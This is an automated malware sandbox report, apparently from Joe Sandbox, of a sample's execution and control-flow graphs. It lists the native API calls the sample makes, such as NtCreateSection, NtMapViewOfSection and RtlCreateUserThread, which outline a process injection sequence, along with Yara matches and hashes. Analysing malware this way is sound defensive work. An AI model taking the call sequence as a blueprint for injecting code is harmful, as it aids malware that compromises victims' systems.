                                                                                            execution_graph 4201 403043 4202 40319a 4201->4202 4203 40306d 4201->4203 4203->4202 4204 403128 RtlCreateUserThread NtTerminateProcess 4203->4204 4204->4202 4286 4014cf 4287 4014d3 4286->4287 4288 401660 NtDuplicateObject 4287->4288 4297 401571 4287->4297 4289 40167d NtCreateSection 4288->4289 4288->4297 4290 4016a3 NtMapViewOfSection 4289->4290 4291 4016fd NtCreateSection 4289->4291 4290->4291 4292 4016c6 NtMapViewOfSection 4290->4292 4293 401729 4291->4293 4291->4297 4292->4291 4294 4016e4 4292->4294 4295 401733 NtMapViewOfSection 4293->4295 4293->4297 4294->4291 4296 40175a NtMapViewOfSection 4295->4296 4295->4297 4296->4297 4260 560005 4265 56092b GetPEB 4260->4265 4262 560030 4267 56003c 4262->4267 4266 560972 4265->4266 4266->4262 4268 560049 4267->4268 4269 560e0f 2 API calls 4268->4269 4270 560223 4269->4270 4271 560d90 GetPEB 4270->4271 4272 560238 VirtualAlloc 4271->4272 4273 560265 4272->4273 4274 5602ce VirtualProtect 4273->4274 4276 56030b 4274->4276 4275 560439 VirtualFree 4279 5604be LoadLibraryA 4275->4279 4276->4275 4278 5608c7 4279->4278 4387 4015d5 4388 4015e4 4387->4388 4389 401660 NtDuplicateObject 4388->4389 4398 40177c 4388->4398 4390 40167d NtCreateSection 4389->4390 4389->4398 4391 4016a3 NtMapViewOfSection 4390->4391 4392 4016fd NtCreateSection 4390->4392 4391->4392 4393 4016c6 NtMapViewOfSection 4391->4393 4394 401729 4392->4394 4392->4398 4393->4392 4395 4016e4 4393->4395 4396 401733 NtMapViewOfSection 4394->4396 4394->4398 4395->4392 4397 40175a NtMapViewOfSection 4396->4397 4396->4398 4397->4398 4205 402f16 4206 402f1a 4205->4206 4208 402fa2 4206->4208 4209 401991 4206->4209 4210 4019a0 4209->4210 4211 4019d8 Sleep 4210->4211 4212 4019f3 4211->4212 4214 4014c4 4211->4214 4212->4208 4215 4014d3 4214->4215 4216 401660 NtDuplicateObject 4215->4216 4220 401571 4215->4220 4217 40167d NtCreateSection 4216->4217 4216->4220 4218 4016a3 NtMapViewOfSection 4217->4218 4219 4016fd NtCreateSection 4217->4219 4218->4219 4221 4016c6 NtMapViewOfSection 4218->4221 4219->4220 4222 401729 4219->4222 4220->4212 4221->4219 4223 4016e4 4221->4223 4222->4220 4224 401733 NtMapViewOfSection 4222->4224 4223->4219 4224->4220 4225 40175a NtMapViewOfSection 4224->4225 4225->4220 4280 560001 4281 560005 4280->4281 4282 56092b GetPEB 4281->4282 4283 560030 4282->4283 4284 56003c 7 API calls 4283->4284 4285 560038 4284->4285 4358 402e9a 4359 402e5f 4358->4359 4361 402eaf 4358->4361 4360 401991 8 API calls 4362 402fa2 4360->4362 4361->4360 4361->4362 4245 6bf2f7 4246 6bf306 4245->4246 4249 6bfa97 4246->4249 4251 6bfab2 4249->4251 4250 6bfabb CreateToolhelp32Snapshot 4250->4251 4252 6bfad7 Module32First 4250->4252 4251->4250 4251->4252 4253 6bfae6 4252->4253 4255 6bf30f 4252->4255 4256 6bf756 4253->4256 4257 6bf781 4256->4257 4258 6bf7ca 4257->4258 4259 6bf792 VirtualAlloc 4257->4259 4258->4258 4259->4258 4310 402ee7 4313 402ef9 4310->4313 4311 402fa2 4312 401991 8 API calls 4312->4311 4313->4311 4313->4312 4435 4019a9 4436 4019a0 4435->4436 4437 4019d8 Sleep 4436->4437 4438 4014c4 7 API calls 4437->4438 4439 4019f3 4437->4439 4438->4439 4226 56003c 4227 560049 4226->4227 4239 560e0f SetErrorMode SetErrorMode 4227->4239 4232 560265 4233 5602ce VirtualProtect 4232->4233 4235 56030b 4233->4235 4234 560439 VirtualFree 4238 5604be LoadLibraryA 4234->4238 4235->4234 4237 5608c7 4238->4237 4240 560223 4239->4240 4241 560d90 4240->4241 4242 560dad 4241->4242 4243 560dbb GetPEB 4242->4243 4244 560238 VirtualAlloc 4242->4244 4243->4244 4244->4232 4363 401975 4364 401979 4363->4364 4365 4014c4 7 API calls 4364->4365 4366 4019f3 4365->4366

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 99 401547 97->99 100 4015bd-4015d4 97->100 98->91 101 40152a-401535 98->101 102 401596-4015a6 99->102 103 401549-40154b 99->103 101->96 105 401537-401543 101->105 106 4015a8 102->106 103->106 107 40154d-40156d 103->107 105->97 109 4015e7-40160a call 401240 107->109 110 40156f 107->110 119 40160c 109->119 120 40160f-401614 109->120 112 401571 110->112 113 4015e2-4015e3 110->113 113->109 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 126 401631-40165a 122->126 127 40193c 122->127 123->120 128 40194b-40198e call 401240 123->128 126->127 136 401660-401677 NtDuplicateObject 126->136 127->128 136->127 138 40167d-4016a1 NtCreateSection 136->138 139 4016a3-4016c4 NtMapViewOfSection 138->139 140 4016fd-401723 NtCreateSection 138->140 139->140 142 4016c6-4016e2 NtMapViewOfSection 139->142 140->127 144 401729-40172d 140->144 142->140 146 4016e4-4016fa 142->146 144->127 147 401733-401754 NtMapViewOfSection 144->147 146->140 147->127 149 40175a-401776 NtMapViewOfSection 147->149 149->127 152 40177c 149->152 152->127 153 40177c call 401781 152->153 153->127
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                                            • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                                            • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                                            • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 154 4015d5-4015e4 156 4015f4 154->156 157 4015eb-4015f0 154->157 156->157 158 4015f7-40160a call 401240 156->158 157->158 161 40160c 158->161 162 40160f-401614 158->162 161->162 164 40161a-40162b 162->164 165 40193e-401946 162->165 168 401631-40165a 164->168 169 40193c 164->169 165->162 170 40194b-40198e call 401240 165->170 168->169 178 401660-401677 NtDuplicateObject 168->178 169->170 178->169 180 40167d-4016a1 NtCreateSection 178->180 181 4016a3-4016c4 NtMapViewOfSection 180->181 182 4016fd-401723 NtCreateSection 180->182 181->182 184 4016c6-4016e2 NtMapViewOfSection 181->184 182->169 186 401729-40172d 182->186 184->182 188 4016e4-4016fa 184->188 186->169 189 401733-401754 NtMapViewOfSection 186->189 188->182 189->169 191 40175a-401776 NtMapViewOfSection 189->191 191->169 194 40177c 191->194 194->169 195 40177c call 401781 194->195 195->169
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                                            • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                                            • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                                            • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 196 4015df-4015e4 198 4015f4 196->198 199 4015eb-4015f0 196->199 198->199 200 4015f7-40160a call 401240 198->200 199->200 203 40160c 200->203 204 40160f-401614 200->204 203->204 206 40161a-40162b 204->206 207 40193e-401946 204->207 210 401631-40165a 206->210 211 40193c 206->211 207->204 212 40194b-40198e call 401240 207->212 210->211 220 401660-401677 NtDuplicateObject 210->220 211->212 220->211 222 40167d-4016a1 NtCreateSection 220->222 223 4016a3-4016c4 NtMapViewOfSection 222->223 224 4016fd-401723 NtCreateSection 222->224 223->224 226 4016c6-4016e2 NtMapViewOfSection 223->226 224->211 228 401729-40172d 224->228 226->224 230 4016e4-4016fa 226->230 228->211 231 401733-401754 NtMapViewOfSection 228->231 230->224 231->211 233 40175a-401776 NtMapViewOfSection 231->233 233->211 236 40177c 233->236 236->211 237 40177c call 401781 236->237 237->211
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                                            • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                                            • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                                            • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 238 4015f2-4015f4 240 4015f7-40160a call 401240 238->240 241 4015eb-4015f0 238->241 244 40160c 240->244 245 40160f-401614 240->245 241->240 244->245 247 40161a-40162b 245->247 248 40193e-401946 245->248 251 401631-40165a 247->251 252 40193c 247->252 248->245 253 40194b-40198e call 401240 248->253 251->252 261 401660-401677 NtDuplicateObject 251->261 252->253 261->252 263 40167d-4016a1 NtCreateSection 261->263 264 4016a3-4016c4 NtMapViewOfSection 263->264 265 4016fd-401723 NtCreateSection 263->265 264->265 267 4016c6-4016e2 NtMapViewOfSection 264->267 265->252 269 401729-40172d 265->269 267->265 271 4016e4-4016fa 267->271 269->252 272 401733-401754 NtMapViewOfSection 269->272 271->265 272->252 274 40175a-401776 NtMapViewOfSection 272->274 274->252 277 40177c 274->277 277->252 278 40177c call 401781 277->278 278->252
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                                            • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                                            • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                                            • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 279 4015e6-40160a call 401240 284 40160c 279->284 285 40160f-401614 279->285 284->285 287 40161a-40162b 285->287 288 40193e-401946 285->288 291 401631-40165a 287->291 292 40193c 287->292 288->285 293 40194b-40198e call 401240 288->293 291->292 301 401660-401677 NtDuplicateObject 291->301 292->293 301->292 303 40167d-4016a1 NtCreateSection 301->303 304 4016a3-4016c4 NtMapViewOfSection 303->304 305 4016fd-401723 NtCreateSection 303->305 304->305 307 4016c6-4016e2 NtMapViewOfSection 304->307 305->292 309 401729-40172d 305->309 307->305 311 4016e4-4016fa 307->311 309->292 312 401733-401754 NtMapViewOfSection 309->312 311->305 312->292 314 40175a-401776 NtMapViewOfSection 312->314 314->292 317 40177c 314->317 317->292 318 40177c call 401781 317->318 318->292
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                                            • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                                            • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                                            • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 319 403043-403067 320 40319a-40319f 319->320 321 40306d-403085 319->321 321->320 322 40308b-40309c 321->322 323 40309e-4030a7 322->323 324 4030ac-4030ba 323->324 324->324 325 4030bc-4030c3 324->325 326 4030e5-4030ec 325->326 327 4030c5-4030e4 325->327 328 40310e-403111 326->328 329 4030ee-40310d 326->329 327->326 330 403113-403116 328->330 331 40311a 328->331 329->328 330->331 332 403118 330->332 331->323 333 40311c-403121 331->333 332->333 333->320 334 403123-403126 333->334 334->320 335 403128-403197 RtlCreateUserThread NtTerminateProcess 334->335 335->320
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                            • String ID:
                                                                                            • API String ID: 1921587553-0
                                                                                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                            • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                            • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 56003c-560047 1 56004c-560263 call 560a3f call 560e0f call 560d90 VirtualAlloc 0->1 2 560049 0->2 17 560265-560289 call 560a69 1->17 18 56028b-560292 1->18 2->1 23 5602ce-5603c2 VirtualProtect call 560cce call 560ce7 17->23 19 5602a1-5602b0 18->19 22 5602b2-5602cc 19->22 19->23 22->19 29 5603d1-5603e0 23->29 30 5603e2-560437 call 560ce7 29->30 31 560439-5604b8 VirtualFree 29->31 30->29 32 5605f4-5605fe 31->32 33 5604be-5604cd 31->33 36 560604-56060d 32->36 37 56077f-560789 32->37 35 5604d3-5604dd 33->35 35->32 39 5604e3-560505 35->39 36->37 42 560613-560637 36->42 40 5607a6-5607b0 37->40 41 56078b-5607a3 37->41 51 560517-560520 39->51 52 560507-560515 39->52 44 5607b6-5607cb 40->44 45 56086e-5608be LoadLibraryA 40->45 41->40 46 56063e-560648 42->46 48 5607d2-5607d5 44->48 50 5608c7-5608f9 45->50 46->37 49 56064e-56065a 46->49 53 5607d7-5607e0 48->53 54 560824-560833 48->54 49->37 55 560660-56066a 49->55 56 560902-56091d 50->56 57 5608fb-560901 50->57 58 560526-560547 51->58 52->58 59 5607e4-560822 53->59 60 5607e2 53->60 62 560839-56083c 54->62 61 56067a-560689 55->61 57->56 63 56054d-560550 58->63 59->48 60->54 64 560750-56077a 61->64 65 56068f-5606b2 61->65 62->45 66 56083e-560847 62->66 68 560556-56056b 63->68 69 5605e0-5605ef 63->69 64->46 70 5606b4-5606ed 65->70 71 5606ef-5606fc 65->71 72 56084b-56086c 66->72 73 560849 66->73 74 56056f-56057a 68->74 75 56056d 68->75 69->35 70->71 76 5606fe-560748 71->76 77 56074b 71->77 72->62 73->45 80 56057c-560599 74->80 81 56059b-5605bb 74->81 75->69 76->77 77->61 84 5605bd-5605db 80->84 81->84 84->63
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0056024D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_560000_3E40.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID: cess$kernel32.dll
                                                                                            • API String ID: 4275171209-1230238691
                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                            • Instruction ID: 27a86b14edabf9ade6a7e6052f94aea87cf6fba087f3c177ac7a62f14760164d
                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                            • Instruction Fuzzy Hash: B2526874A01229DFDB64CF58C985BA9BBB1BF09304F1480D9E94DAB391DB30AE85DF14

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 336 6bfa97-6bfab0 337 6bfab2-6bfab4 336->337 338 6bfabb-6bfac7 CreateToolhelp32Snapshot 337->338 339 6bfab6 337->339 340 6bfac9-6bfacf 338->340 341 6bfad7-6bfae4 Module32First 338->341 339->338 340->341 348 6bfad1-6bfad5 340->348 342 6bfaed-6bfaf5 341->342 343 6bfae6-6bfae7 call 6bf756 341->343 346 6bfaec 343->346 346->342 348->337 348->341
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006BFABF
                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 006BFADF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_6ad000_3E40.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 3833638111-0
                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction ID: 7575ceb237050df873f7dfafd890a7a72d897b5cab12ef2efec254c687181027
                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction Fuzzy Hash: DEF0F076200314ABD7243BF8AC8CBEF72E9EF48320F100938EA4A911D0DB70EC854B60

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 349 560e0f-560e24 SetErrorMode * 2 350 560e26 349->350 351 560e2b-560e2c 349->351 350->351
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,00560223,?,?), ref: 00560E19
                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,00560223,?,?), ref: 00560E1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_560000_3E40.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                            • Instruction ID: a5b931f4ea7891f8ec39f80adb89aa55d3030c8fd74fa9dfc01ba301779e0f72
                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                            • Instruction Fuzzy Hash: 6CD0123154512877D7102A94DC09BCE7F1CDF05B62F008411FB0DD9080C771994046E5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 352 401991-4019ed call 401240 Sleep 364 4019f3-4019f5 352->364 365 4019ee call 4014c4 352->365 366 401a04-401a24 364->366 367 4019f7-4019ff call 4015b7 364->367 365->364 373 401a32 366->373 374 401a29-401a35 366->374 367->366 373->374 376 401a46 374->376 377 401a3a-401a52 call 401240 374->377 376->377
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                            • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                                            • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                            • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 381 4019a9-4019ed call 401240 Sleep 393 4019f3-4019f5 381->393 394 4019ee call 4014c4 381->394 395 401a04-401a24 393->395 396 4019f7-4019ff call 4015b7 393->396 394->393 402 401a32 395->402 403 401a29-401a35 395->403 396->395 402->403 405 401a46 403->405 406 401a3a-401a52 call 401240 403->406 405->406
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                            • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                                            • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                            • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 410 4019af-4019ed call 401240 Sleep 417 4019f3-4019f5 410->417 418 4019ee call 4014c4 410->418 419 401a04-401a24 417->419 420 4019f7-4019ff call 4015b7 417->420 418->417 426 401a32 419->426 427 401a29-401a35 419->427 420->419 426->427 429 401a46 427->429 430 401a3a-401a52 call 401240 427->430 429->430
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_3E40.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                            • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                                            • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                            • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 434 4019b8-4019ed call 401240 Sleep 438 4019f3-4019f5 434->438 439 4019ee call 4014c4 434->439 440 401a04-401a24 438->440 441 4019f7-4019ff call 4015b7 438->441 439->438 447 401a32 440->447 448 401a29-401a35 440->448 441->440 447->448 450 401a46 448->450 451 401a3a-401a52 call 401240 448->451 450->451
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
